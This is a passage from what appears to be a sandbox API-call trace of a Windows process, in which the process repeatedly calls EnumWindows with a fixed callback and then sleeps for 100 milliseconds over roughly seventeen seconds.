(lpEnumFunc=0x2463dd0, lParam=0x2360000) [0270.317] Sleep (dwMilliseconds=0x64) [0270.391] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0270.393] Sleep (dwMilliseconds=0x64) [0270.471] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0270.472] Sleep (dwMilliseconds=0x64) [0270.564] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0270.566] Sleep (dwMilliseconds=0x64) [0270.609] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0270.610] Sleep (dwMilliseconds=0x64) [0270.622] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0270.623] Sleep (dwMilliseconds=0x64) [0270.672] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0270.673] Sleep (dwMilliseconds=0x64) [0270.693] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0270.694] Sleep (dwMilliseconds=0x64) [0270.701] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0270.702] Sleep (dwMilliseconds=0x64) [0270.762] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0270.764] Sleep (dwMilliseconds=0x64) [0270.866] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0270.868] Sleep (dwMilliseconds=0x64) [0270.935] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0270.936] Sleep (dwMilliseconds=0x64) [0271.030] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0271.031] Sleep (dwMilliseconds=0x64) [0271.082] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0271.083] Sleep (dwMilliseconds=0x64) [0271.098] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0271.099] Sleep (dwMilliseconds=0x64) [0271.145] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0271.146] Sleep (dwMilliseconds=0x64) [0271.179] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0271.179] Sleep (dwMilliseconds=0x64) [0271.231] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0271.233] Sleep (dwMilliseconds=0x64) [0271.298] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0271.298] Sleep (dwMilliseconds=0x64) [0271.469] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0271.470] Sleep (dwMilliseconds=0x64) [0271.581] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0271.582] Sleep (dwMilliseconds=0x64) [0271.671] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0271.673] Sleep (dwMilliseconds=0x64) [0271.773] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0271.774] Sleep (dwMilliseconds=0x64) [0271.828] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0271.830] Sleep (dwMilliseconds=0x64) [0271.876] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0271.877] Sleep (dwMilliseconds=0x64) [0271.927] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0271.928] Sleep (dwMilliseconds=0x64) [0272.004] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0272.005] Sleep (dwMilliseconds=0x64) [0272.090] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0272.092] Sleep (dwMilliseconds=0x64) [0272.186] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0272.187] Sleep (dwMilliseconds=0x64) [0272.262] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0272.264] Sleep (dwMilliseconds=0x64) [0272.344] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0272.345] Sleep (dwMilliseconds=0x64) [0272.390] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0272.391] Sleep (dwMilliseconds=0x64) [0272.440] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0272.440] Sleep (dwMilliseconds=0x64) [0272.611] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0272.613] Sleep (dwMilliseconds=0x64) [0272.761] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0272.761] Sleep (dwMilliseconds=0x64) [0272.869] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0272.873] Sleep (dwMilliseconds=0x64) [0272.978] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0272.979] Sleep (dwMilliseconds=0x64) [0273.100] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0273.104] Sleep (dwMilliseconds=0x64) [0273.159] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0273.160] Sleep (dwMilliseconds=0x64) [0273.214] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0273.215] Sleep (dwMilliseconds=0x64) [0273.270] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0273.271] Sleep (dwMilliseconds=0x64) [0273.315] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0273.317] Sleep (dwMilliseconds=0x64) [0273.328] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0273.329] Sleep (dwMilliseconds=0x64) [0273.391] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0273.393] Sleep (dwMilliseconds=0x64) [0273.436] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0273.437] Sleep (dwMilliseconds=0x64) [0273.479] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0273.480] Sleep (dwMilliseconds=0x64) [0273.562] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0273.563] Sleep (dwMilliseconds=0x64) [0273.655] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0273.657] Sleep (dwMilliseconds=0x64) [0273.768] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0273.769] Sleep (dwMilliseconds=0x64) [0273.859] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0273.861] Sleep (dwMilliseconds=0x64) [0273.901] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0273.902] Sleep (dwMilliseconds=0x64) [0273.951] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0273.952] Sleep (dwMilliseconds=0x64) [0273.997] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0273.998] Sleep (dwMilliseconds=0x64) [0274.149] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0274.150] Sleep (dwMilliseconds=0x64) [0274.224] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0274.226] Sleep (dwMilliseconds=0x64) [0274.270] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0274.271] Sleep (dwMilliseconds=0x64) [0274.312] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0274.313] Sleep (dwMilliseconds=0x64) [0274.350] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0274.350] Sleep (dwMilliseconds=0x64) [0274.395] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0274.396] Sleep (dwMilliseconds=0x64) [0274.469] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0274.470] Sleep (dwMilliseconds=0x64) [0274.510] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0274.516] Sleep (dwMilliseconds=0x64) [0274.563] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0274.564] Sleep (dwMilliseconds=0x64) [0274.592] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0274.594] Sleep (dwMilliseconds=0x64) [0274.624] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0274.625] Sleep (dwMilliseconds=0x64) [0274.720] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0274.721] Sleep (dwMilliseconds=0x64) [0274.799] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0274.799] Sleep (dwMilliseconds=0x64) [0274.890] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0274.891] Sleep (dwMilliseconds=0x64) [0275.108] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0275.109] Sleep (dwMilliseconds=0x64) [0275.216] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0275.217] Sleep (dwMilliseconds=0x64) [0275.261] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0275.261] Sleep (dwMilliseconds=0x64) [0275.278] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0275.280] Sleep (dwMilliseconds=0x64) [0275.329] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0275.330] Sleep (dwMilliseconds=0x64) [0275.343] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0275.344] Sleep (dwMilliseconds=0x64) [0275.397] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0275.398] Sleep (dwMilliseconds=0x64) [0275.481] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0275.485] Sleep (dwMilliseconds=0x64) [0275.580] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0275.581] Sleep (dwMilliseconds=0x64) [0275.695] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0275.696] Sleep (dwMilliseconds=0x64) [0275.812] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0275.813] Sleep (dwMilliseconds=0x64) [0275.828] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0275.830] Sleep (dwMilliseconds=0x64) [0275.876] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0275.877] Sleep (dwMilliseconds=0x64) [0275.906] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0275.908] Sleep (dwMilliseconds=0x64) [0275.972] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0275.973] Sleep (dwMilliseconds=0x64) [0276.074] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0276.079] Sleep (dwMilliseconds=0x64) [0276.200] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0276.201] Sleep (dwMilliseconds=0x64) [0276.266] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0276.268] Sleep (dwMilliseconds=0x64) [0276.342] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0276.343] Sleep (dwMilliseconds=0x64) [0276.402] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0276.406] Sleep (dwMilliseconds=0x64) [0276.454] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0276.455] Sleep (dwMilliseconds=0x64) [0276.497] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0276.498] Sleep (dwMilliseconds=0x64) [0276.594] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0276.595] Sleep (dwMilliseconds=0x64) [0276.698] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0276.701] Sleep (dwMilliseconds=0x64) [0276.767] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0276.768] Sleep (dwMilliseconds=0x64) [0276.858] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0276.860] Sleep (dwMilliseconds=0x64) [0276.924] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0276.925] Sleep (dwMilliseconds=0x64) [0276.937] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0276.939] Sleep (dwMilliseconds=0x64) [0276.986] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0276.987] Sleep (dwMilliseconds=0x64) [0277.018] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0277.019] Sleep (dwMilliseconds=0x64) [0277.094] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0277.095] Sleep (dwMilliseconds=0x64) [0277.171] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0277.172] Sleep (dwMilliseconds=0x64) [0277.267] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0277.267] Sleep (dwMilliseconds=0x64) [0277.390] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0277.392] Sleep (dwMilliseconds=0x64) [0277.432] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0277.433] Sleep (dwMilliseconds=0x64) [0277.484] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0277.485] Sleep (dwMilliseconds=0x64) [0277.531] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0277.532] Sleep (dwMilliseconds=0x64) [0277.575] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0277.576] Sleep (dwMilliseconds=0x64) [0277.671] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0277.673] Sleep (dwMilliseconds=0x64) [0277.753] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0277.754] Sleep (dwMilliseconds=0x64) [0277.797] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0277.799] Sleep (dwMilliseconds=0x64) [0277.861] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0277.861] Sleep (dwMilliseconds=0x64) [0277.953] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0277.955] Sleep (dwMilliseconds=0x64) [0278.022] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0278.023] Sleep (dwMilliseconds=0x64) [0278.028] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0278.029] Sleep (dwMilliseconds=0x64) [0278.069] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0278.070] Sleep (dwMilliseconds=0x64) [0278.155] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0278.157] Sleep (dwMilliseconds=0x64) [0278.250] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0278.251] Sleep (dwMilliseconds=0x64) [0278.343] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0278.345] Sleep (dwMilliseconds=0x64) [0278.439] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0278.440] Sleep (dwMilliseconds=0x64) [0278.597] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0278.598] Sleep (dwMilliseconds=0x64) [0278.688] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0278.689] Sleep (dwMilliseconds=0x64) [0278.769] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0278.771] Sleep (dwMilliseconds=0x64) [0278.811] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0278.812] Sleep (dwMilliseconds=0x64) [0278.825] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0278.829] Sleep (dwMilliseconds=0x64) [0278.877] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0278.878] Sleep (dwMilliseconds=0x64) [0278.951] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0278.953] Sleep (dwMilliseconds=0x64) [0279.001] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0279.001] Sleep (dwMilliseconds=0x64) [0279.122] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0279.126] Sleep (dwMilliseconds=0x64) [0279.297] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0279.298] Sleep (dwMilliseconds=0x64) [0279.391] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0279.392] Sleep (dwMilliseconds=0x64) [0279.483] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0279.484] Sleep (dwMilliseconds=0x64) [0279.608] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0279.609] Sleep (dwMilliseconds=0x64) [0279.732] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0279.733] Sleep (dwMilliseconds=0x64) [0279.903] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0279.905] Sleep (dwMilliseconds=0x64) [0280.002] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0280.003] Sleep (dwMilliseconds=0x64) [0280.043] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0280.045] Sleep (dwMilliseconds=0x64) [0280.063] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0280.064] Sleep (dwMilliseconds=0x64) [0280.122] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0280.124] Sleep (dwMilliseconds=0x64) [0280.158] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0280.159] Sleep (dwMilliseconds=0x64) [0280.200] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0280.201] Sleep (dwMilliseconds=0x64) [0280.264] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0280.265] Sleep (dwMilliseconds=0x64) [0280.357] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0280.358] Sleep (dwMilliseconds=0x64) [0280.435] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0280.436] Sleep (dwMilliseconds=0x64) [0280.466] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0280.467] Sleep (dwMilliseconds=0x64) [0280.482] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0280.482] Sleep (dwMilliseconds=0x64) [0280.609] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0280.611] Sleep (dwMilliseconds=0x64) [0280.734] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0280.734] Sleep (dwMilliseconds=0x64) [0280.838] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0280.839] Sleep (dwMilliseconds=0x64) [0281.004] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0281.007] Sleep (dwMilliseconds=0x64) [0281.128] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0281.128] Sleep (dwMilliseconds=0x64) [0281.168] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0281.172] Sleep (dwMilliseconds=0x64) [0281.188] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0281.189] Sleep (dwMilliseconds=0x64) [0281.234] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0281.235] Sleep (dwMilliseconds=0x64) [0281.278] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0281.279] Sleep (dwMilliseconds=0x64) [0281.374] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0281.376] Sleep (dwMilliseconds=0x64) [0281.456] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0281.456] Sleep (dwMilliseconds=0x64) [0281.504] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0281.505] Sleep (dwMilliseconds=0x64) [0281.615] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0281.616] Sleep (dwMilliseconds=0x64) [0281.721] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0281.722] Sleep (dwMilliseconds=0x64) [0281.782] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0281.782] Sleep (dwMilliseconds=0x64) [0281.817] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0281.818] Sleep (dwMilliseconds=0x64) [0281.877] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0281.878] Sleep (dwMilliseconds=0x64) [0282.153] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0282.155] Sleep (dwMilliseconds=0x64) [0282.207] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0282.208] Sleep (dwMilliseconds=0x64) [0282.317] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0282.319] Sleep (dwMilliseconds=0x64) [0282.424] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0282.425] Sleep (dwMilliseconds=0x64) [0282.516] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0282.517] Sleep (dwMilliseconds=0x64) [0282.586] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0282.587] Sleep (dwMilliseconds=0x64) [0282.641] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0282.643] Sleep (dwMilliseconds=0x64) [0282.712] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0282.715] Sleep (dwMilliseconds=0x64) [0282.768] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0282.769] Sleep (dwMilliseconds=0x64) [0282.817] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0282.818] Sleep (dwMilliseconds=0x64) [0282.909] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0282.910] Sleep (dwMilliseconds=0x64) [0283.001] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0283.002] Sleep (dwMilliseconds=0x64) [0283.096] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0283.096] Sleep (dwMilliseconds=0x64) [0283.184] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0283.188] Sleep (dwMilliseconds=0x64) [0283.393] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0283.394] Sleep (dwMilliseconds=0x64) [0283.452] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0283.454] Sleep (dwMilliseconds=0x64) [0283.501] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0283.502] Sleep (dwMilliseconds=0x64) [0283.546] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0283.548] Sleep (dwMilliseconds=0x64) [0283.606] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0283.608] Sleep (dwMilliseconds=0x64) [0283.689] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0283.690] Sleep (dwMilliseconds=0x64) [0283.780] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0283.782] Sleep (dwMilliseconds=0x64) [0283.833] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0283.833] Sleep (dwMilliseconds=0x64) [0283.872] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0283.876] Sleep (dwMilliseconds=0x64) [0283.938] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0283.938] Sleep (dwMilliseconds=0x64) [0283.971] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0283.972] Sleep (dwMilliseconds=0x64) [0283.985] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0283.985] Sleep (dwMilliseconds=0x64) [0283.999] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0284.001] Sleep (dwMilliseconds=0x64) [0284.047] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0284.048] Sleep (dwMilliseconds=0x64) [0284.112] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0284.113] Sleep (dwMilliseconds=0x64) [0284.191] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0284.192] Sleep (dwMilliseconds=0x64) [0284.296] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0284.298] Sleep (dwMilliseconds=0x64) [0284.406] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0284.407] Sleep (dwMilliseconds=0x64) [0284.510] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0284.511] Sleep (dwMilliseconds=0x64) [0284.540] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0284.541] Sleep (dwMilliseconds=0x64) [0284.544] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0284.545] Sleep (dwMilliseconds=0x64) [0284.560] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0284.561] Sleep (dwMilliseconds=0x64) [0284.606] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0284.610] Sleep (dwMilliseconds=0x64) [0284.625] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0284.625] Sleep (dwMilliseconds=0x64) [0284.671] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0284.672] Sleep (dwMilliseconds=0x64) [0284.767] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0284.768] Sleep (dwMilliseconds=0x64) [0284.843] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0284.845] Sleep (dwMilliseconds=0x64) [0284.907] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0284.908] Sleep (dwMilliseconds=0x64) [0285.002] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0285.004] Sleep (dwMilliseconds=0x64) [0285.033] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0285.033] Sleep (dwMilliseconds=0x64) [0285.043] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0285.044] Sleep (dwMilliseconds=0x64) [0285.062] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0285.063] Sleep (dwMilliseconds=0x64) [0285.106] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0285.108] Sleep (dwMilliseconds=0x64) [0285.124] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0285.124] Sleep (dwMilliseconds=0x64) [0285.185] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0285.187] Sleep (dwMilliseconds=0x64) [0285.264] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0285.265] Sleep (dwMilliseconds=0x64) [0285.371] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0285.373] Sleep (dwMilliseconds=0x64) [0285.436] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0285.437] Sleep (dwMilliseconds=0x64) [0285.513] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0285.515] Sleep (dwMilliseconds=0x64) [0285.622] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0285.623] Sleep (dwMilliseconds=0x64) [0285.706] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0285.707] Sleep (dwMilliseconds=0x64) [0285.718] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0285.719] Sleep (dwMilliseconds=0x64) [0285.747] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0285.752] Sleep (dwMilliseconds=0x64) [0285.891] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0285.892] Sleep (dwMilliseconds=0x64) [0285.942] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0285.943] Sleep (dwMilliseconds=0x64) [0286.001] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0286.002] Sleep (dwMilliseconds=0x64) [0286.090] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0286.092] Sleep (dwMilliseconds=0x64) [0286.180] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0286.181] Sleep (dwMilliseconds=0x64) [0286.233] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0286.234] Sleep (dwMilliseconds=0x64) [0286.299] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0286.300] Sleep (dwMilliseconds=0x64) [0286.410] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0286.412] Sleep (dwMilliseconds=0x64) [0286.539] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0286.540] Sleep (dwMilliseconds=0x64) [0286.595] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0286.597] Sleep (dwMilliseconds=0x64) [0286.682] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0286.683] Sleep (dwMilliseconds=0x64) [0286.792] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0286.793] Sleep (dwMilliseconds=0x64) [0286.839] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0286.840] Sleep (dwMilliseconds=0x64) [0286.878] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0286.880] Sleep (dwMilliseconds=0x64) [0286.927] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0286.929] Sleep (dwMilliseconds=0x64) [0287.027] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0287.032] Sleep (dwMilliseconds=0x64) [0287.085] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) [0287.086] Sleep (dwMilliseconds=0x64) [0287.130] EnumWindows (lpEnumFunc=0x2463dd0, 